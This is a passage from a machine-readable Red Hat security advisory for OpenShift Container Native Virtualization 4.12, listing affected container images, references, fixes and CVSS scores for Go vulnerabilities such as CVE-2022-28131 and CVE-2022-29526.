"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-28131"
},
{
"category": "external",
"summary": "RHBZ#2107390",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2107390"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-28131",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28131"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-28131",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28131"
},
{
"category": "external",
"summary": "https://go.dev/issue/53614",
"url": "https://go.dev/issue/53614"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE",
"url": "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE"
}
],
"release_date": "2022-07-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: encoding/xml: stack exhaustion in Decoder.Skip"
},
{
"acknowledgments": [
{
"names": [
"Jo\u00ebl G\u00e4hwiler"
],
"summary": "Acknowledged by upstream."
}
],
"cve": "CVE-2022-29526",
"cwe": {
"id": "CWE-280",
"name": "Improper Handling of Insufficient Permissions or Privileges "
},
"discovery_date": "2022-05-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2084085"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the syscall.Faccessat function when calling a process by checking the group. This flaw allows an attacker to check the process group permissions rather than a member of the file\u0027s group, affecting system availability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: syscall: faccessat checks wrong group",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64"
],
"known_not_affected": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64",
"8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-29526"
},
{
"category": "external",
"summary": "RHBZ#2084085",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2084085"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU",
"url": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU"
}
],
"release_date": "2022-05-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2023-01-25T11:11:29+00:00",
"details": "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2023:0408"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: syscall: faccessat checks wrong group"
},
{
"cve": "CVE-2022-30629",
"cwe": {
"id": "CWE-331",
"name": "Insufficient Entropy"
},
"discovery_date": "2022-06-02T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64",
"8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64",
"8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64",
